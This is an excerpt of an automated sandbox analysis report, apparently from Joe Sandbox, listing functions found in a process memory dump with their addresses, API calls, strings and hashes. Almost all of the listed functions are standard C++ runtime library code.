                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B3ECD8
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                  • String ID:
                                                                  • API String ID: 2854358121-0
                                                                  • Opcode ID: d154ebc02a0c0e525bd82a8463115ef4b3c162e8f7d2c9fcbb71f550f5d9338c
                                                                  • Instruction ID: a0150c51dce9c715e802bac4796c14dcee65737c62ed83a0adbb768d447c9391
                                                                  • Opcode Fuzzy Hash: d154ebc02a0c0e525bd82a8463115ef4b3c162e8f7d2c9fcbb71f550f5d9338c
                                                                  • Instruction Fuzzy Hash: FB01A932900129DBCB01AB649851ABEB7F1FF84720F68048AF4296B2D2CF749E018B91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B32C4A Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B32C51
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B32C5B
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B32CAC
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B32CCC
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                  • String ID:
                                                                  • API String ID: 2854358121-0
                                                                  • Opcode ID: d49b9344c37b05382790368201fe10d725bf4f6b0ce9d3b9a2b86edb99de16fe
                                                                  • Instruction ID: 9d8c5d38bffd424507ef1b912c6c0d9fdef3ede0fe5d07f2278c3fa79eff7e60
                                                                  • Opcode Fuzzy Hash: d49b9344c37b05382790368201fe10d725bf4f6b0ce9d3b9a2b86edb99de16fe
                                                                  • Instruction Fuzzy Hash: 6D018C36901129DBCB15EBA498516BEB7F1FF84720F290489F5196B391CF749E018B91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B32E9E Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B32EA5
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B32EAF
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B32F00
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B32F20
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                  • String ID:
                                                                  • API String ID: 2854358121-0
                                                                  • Opcode ID: b2127bc789254d080f9b7c6e3fa2a38862e4d2fb5b0b32a8d1b88f5dd26af55e
                                                                  • Instruction ID: 24032b470fbc4df910af6e065e9dd253715a532fb4c26bb95f5d4d7d81f01e8a
                                                                  • Opcode Fuzzy Hash: b2127bc789254d080f9b7c6e3fa2a38862e4d2fb5b0b32a8d1b88f5dd26af55e
                                                                  • Instruction Fuzzy Hash: 2401C0359001299BCB01EB64D8156BE77F0FF84710F340489F5196B2D1DF749E00CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B32E09 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B32E10
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B32E1A
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B32E6B
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B32E8B
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                  • String ID:
                                                                  • API String ID: 2854358121-0
                                                                  • Opcode ID: 4421d14e76a817d171b20ec907d89d99b69355cef2dbeebbeed866ad8a36b9ee
                                                                  • Instruction ID: 24f755dd18bac16df950237c982d0dda8b7ede0a9499bb2599461cceb159f8d8
                                                                  • Opcode Fuzzy Hash: 4421d14e76a817d171b20ec907d89d99b69355cef2dbeebbeed866ad8a36b9ee
                                                                  • Instruction Fuzzy Hash: 5101C036900529DBCB11EB64E8126BEB7F1FF94B10F280989E5187B291CF749E018791
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B32F33 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00B32F3A
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B32F44
                                                                    • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
                                                                    • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B32F95
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B32FB5
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                  • String ID:
                                                                  • API String ID: 2854358121-0
                                                                  • Opcode ID: 0b371dbf99a9530554d8d40d085c65915411117b2ba3495efa996dbdc79ada35
                                                                  • Instruction ID: bcb8e2c79bbaa6ba6b62e2ea8c64073442d9151668506ed1f3b758047eb10403
                                                                  • Opcode Fuzzy Hash: 0b371dbf99a9530554d8d40d085c65915411117b2ba3495efa996dbdc79ada35
                                                                  • Instruction Fuzzy Hash: 4C01CC36A10129DFCB11EB649811ABEB7F1FF94720F280489F418AB292CF749E008B91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B63686 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00B63053,?,00000001,?,?,?,00B62198,?,?,00000000), ref: 00B6369D
                                                                  • GetLastError.KERNEL32(?,00B63053,?,00000001,?,?,?,00B62198,?,?,00000000,?,?,?,00B6271F,?), ref: 00B636A9
                                                                    • Part of subcall function 00B6366F: CloseHandle.KERNEL32(FFFFFFFE,00B636B9,?,00B63053,?,00000001,?,?,?,00B62198,?,?,00000000,?,?), ref: 00B6367F
                                                                  • ___initconout.LIBCMT ref: 00B636B9
                                                                    • Part of subcall function 00B63631: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00B63660,00B63040,?,?,00B62198,?,?,00000000,?), ref: 00B63644
                                                                  • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00B63053,?,00000001,?,?,?,00B62198,?,?,00000000,?), ref: 00B636CE
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                  • String ID:
                                                                  • API String ID: 2744216297-0
                                                                  • Opcode ID: 1f88f4822dc35fac3268bda839a04462319ac7a964c50e4fcd58e58d76f26ffc
                                                                  • Instruction ID: 4cdddbcc9ad2bf1aa66cd5395394c505cc701a2323d5255b478d9312c52348c4
                                                                  • Opcode Fuzzy Hash: 1f88f4822dc35fac3268bda839a04462319ac7a964c50e4fcd58e58d76f26ffc
                                                                  • Instruction Fuzzy Hash: F3F03036549118BBCF222F99DC04D893FE6FB097A1B0040A4FE1997270CE368A60EB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B42D20 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SleepConditionVariableCS.KERNELBASE(?,00B42CBD,00000064), ref: 00B42D43
                                                                  • LeaveCriticalSection.KERNEL32(00B7DD3C,?,?,00B42CBD,00000064,?,?,?,00B223B6,00B7E638,823FDEC6,?,?,00B63D6D,000000FF), ref: 00B42D4D
                                                                  • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00B42CBD,00000064,?,?,?,00B223B6,00B7E638,823FDEC6,?,?,00B63D6D,000000FF), ref: 00B42D5E
                                                                  • EnterCriticalSection.KERNEL32(00B7DD3C,?,00B42CBD,00000064,?,?,?,00B223B6,00B7E638,823FDEC6,?,?,00B63D6D,000000FF), ref: 00B42D65
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                  • String ID:
                                                                  • API String ID: 3269011525-0
                                                                  • Opcode ID: d4d4a5e16fbeed788ddca84f0a97ee79e1c2eecee95a2b7aee1350d63cbce7e0
                                                                  • Instruction ID: 4056a53c670e9665c010d73355c5445f24f7794ef0474d4ac2efdbf8f4a553d5
                                                                  • Opcode Fuzzy Hash: d4d4a5e16fbeed788ddca84f0a97ee79e1c2eecee95a2b7aee1350d63cbce7e0
                                                                  • Instruction Fuzzy Hash: 2BE04832585524FBCB322B54EC08A9E3F79EF05B95B0040F1F50D671B1CFA55A409BE1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B2EC87 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 00B2EC8E
                                                                    • Part of subcall function 00B2D87C: __EH_prolog3.LIBCMT ref: 00B2D883
                                                                    • Part of subcall function 00B2D87C: std::_Lockit::_Lockit.LIBCPMT ref: 00B2D88D
                                                                    • Part of subcall function 00B2D87C: std::_Lockit::~_Lockit.LIBCPMT ref: 00B2D8FE
                                                                  • _Find_elem.LIBCPMT ref: 00B2EE8A
                                                                  Strings
                                                                  • 0123456789ABCDEFabcdef-+Xx, xrefs: 00B2ECF6
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                  • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                  • API String ID: 2544715827-2799312399
                                                                  • Opcode ID: ff5ea228b7adff5152dd96b657396dd584260e56b49bee3bd9c7416847635c6e
                                                                  • Instruction ID: fb123db7a0e7c2af36f7c65588c34efb96eb5d308d589612934a183c56aa6b05
                                                                  • Opcode Fuzzy Hash: ff5ea228b7adff5152dd96b657396dd584260e56b49bee3bd9c7416847635c6e
                                                                  • Instruction Fuzzy Hash: 34C18334D042A88AEF15EFA5E5507ECBBF2AF55300F2940E9D8A96B243C734DD46C751
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B362BE Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 316COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 00B362C8
                                                                    • Part of subcall function 00B32D74: __EH_prolog3.LIBCMT ref: 00B32D7B
                                                                    • Part of subcall function 00B32D74: std::_Lockit::_Lockit.LIBCPMT ref: 00B32D85
                                                                    • Part of subcall function 00B32D74: std::_Lockit::~_Lockit.LIBCPMT ref: 00B32DF6
                                                                  • _Find_elem.LIBCPMT ref: 00B36502
                                                                  Strings
                                                                  • 0123456789ABCDEFabcdef-+Xx, xrefs: 00B3633F
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                  • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                  • API String ID: 2544715827-2799312399
                                                                  • Opcode ID: 1e3ab7f8948a3bee7bfff94aba4c9b2c8803221a30ed258014383898c5c24e0c
                                                                  • Instruction ID: 50316394fcb312761cf160616e7b46ec305f309de875fedfb40498d9388c9da1
                                                                  • Opcode Fuzzy Hash: 1e3ab7f8948a3bee7bfff94aba4c9b2c8803221a30ed258014383898c5c24e0c
                                                                  • Instruction Fuzzy Hash: 0BC17270E04258AADF259F68C8817ECBBF1BF11304F64C0D9D889AB386DB749D85CB54
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B36694 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 316COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 00B3669E
                                                                    • Part of subcall function 00B2B8B0: std::_Lockit::_Lockit.LIBCPMT ref: 00B2B8DD
                                                                    • Part of subcall function 00B2B8B0: std::_Lockit::_Lockit.LIBCPMT ref: 00B2B900
                                                                    • Part of subcall function 00B2B8B0: std::_Lockit::~_Lockit.LIBCPMT ref: 00B2B928
                                                                    • Part of subcall function 00B2B8B0: std::_Lockit::~_Lockit.LIBCPMT ref: 00B2B9B7
                                                                  • _Find_elem.LIBCPMT ref: 00B368D8
                                                                  Strings
                                                                  • 0123456789ABCDEFabcdef-+Xx, xrefs: 00B36715
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                  • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                  • API String ID: 3042121994-2799312399
                                                                  • Opcode ID: 60b521ffba782ba7dd5e31daf2edd5d6698e94671651b1c121fc46346abf8b73
                                                                  • Instruction ID: 5b1f96b980daf64a8978216a322fae2c841ac663ff8d054a786daf57c0ea193b
                                                                  • Opcode Fuzzy Hash: 60b521ffba782ba7dd5e31daf2edd5d6698e94671651b1c121fc46346abf8b73
                                                                  • Instruction Fuzzy Hash: 7CC17230E04258ABDF259F64C8917ACBBF2FF55304F64C1DAD889AB282DB749D85CB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B51A6D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __startOneArgErrorHandling.LIBCMT ref: 00B51AFD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorHandling__start
                                                                  • String ID: pow
                                                                  • API String ID: 3213639722-2276729525
                                                                  • Opcode ID: 3ad6e5e56230b20eaef4ccd19154a982588d1e0d51e072069d52fd7b306a448d
                                                                  • Instruction ID: 7909694e70566e1ad3ea9b4d8861c647b74ba03404be2ba8e25dabef4f03ddc2
                                                                  • Opcode Fuzzy Hash: 3ad6e5e56230b20eaef4ccd19154a982588d1e0d51e072069d52fd7b306a448d
                                                                  • Instruction Fuzzy Hash: AA515A61A091019ACB12771CC95137A6BE4EB40703F204FD9ECD1962E9EF368CDD9A4B
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B41E70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 182COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldiv
                                                                  • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                                                  • API String ID: 3732870572-1956417402
                                                                  • Opcode ID: 7f5b1617366d2b43421e3c184f17b31d26585b0d6f4451cf826cc0bf80851ce8
                                                                  • Instruction ID: 0c95ff44273f1044edecfe4fbb399fe1dd40a97c175048a49b5ed8dbffef7dc1
                                                                  • Opcode Fuzzy Hash: 7f5b1617366d2b43421e3c184f17b31d26585b0d6f4451cf826cc0bf80851ce8
                                                                  • Instruction Fuzzy Hash: 2751BF30F04285AADF258FAC84817BEBFF9AF05340F5448DAE891D7241C7758B86EB61
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B2BD90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 167COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00B2BF6E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Concurrency::cancel_current_task
                                                                  • String ID: false$true
                                                                  • API String ID: 118556049-2658103896
                                                                  • Opcode ID: 59e4010215a3141cce08d13d82345839899d948b1e1f8ef04886fe37fb8ad2b4
                                                                  • Instruction ID: 9dae734a96083f673ad8dac3950a9c25b524db436c13347eccdb5f74644433a6
                                                                  • Opcode Fuzzy Hash: 59e4010215a3141cce08d13d82345839899d948b1e1f8ef04886fe37fb8ad2b4
                                                                  • Instruction Fuzzy Hash: 0351D8B1D007589FDB10DFA4C941BEEBBF8FF05300F1486AAE849A7241E774A645CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B270A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 149COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: \\?\$\\?\UNC\
                                                                  • API String ID: 0-3019864461
                                                                  • Opcode ID: a4ffc64d78b0c1df7387c8cbc8a1e0d05f09fdabbcdab8f9a9bb738a38ef6189
                                                                  • Instruction ID: 8a1d165370323560246c20ffc16f4f5138c79cf956fb4251b155e772e9584e9d
                                                                  • Opcode Fuzzy Hash: a4ffc64d78b0c1df7387c8cbc8a1e0d05f09fdabbcdab8f9a9bb738a38ef6189
                                                                  • Instruction Fuzzy Hash: 0F510270A442249BDB14CF64E885BEEB7F5FF99304F10459DE40AB7290DFB46984CB98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B3D4FA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 00B3D501
                                                                  • _swprintf.LIBCMT ref: 00B3D573
                                                                    • Part of subcall function 00B3254E: __EH_prolog3.LIBCMT ref: 00B32555
                                                                    • Part of subcall function 00B3254E: std::_Lockit::_Lockit.LIBCPMT ref: 00B3255F
                                                                    • Part of subcall function 00B3254E: std::_Lockit::~_Lockit.LIBCPMT ref: 00B325D0
                                                                    • Part of subcall function 00B32FC8: __EH_prolog3.LIBCMT ref: 00B32FCF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog3Lockitstd::_$H_prolog3_Lockit::_Lockit::~__swprintf
                                                                  • String ID: %.0Lf
                                                                  • API String ID: 3050236999-1402515088
                                                                  • Opcode ID: c0543086663747fb69594ea547407796e8294431db4b638586f3cd6ff03a3e57
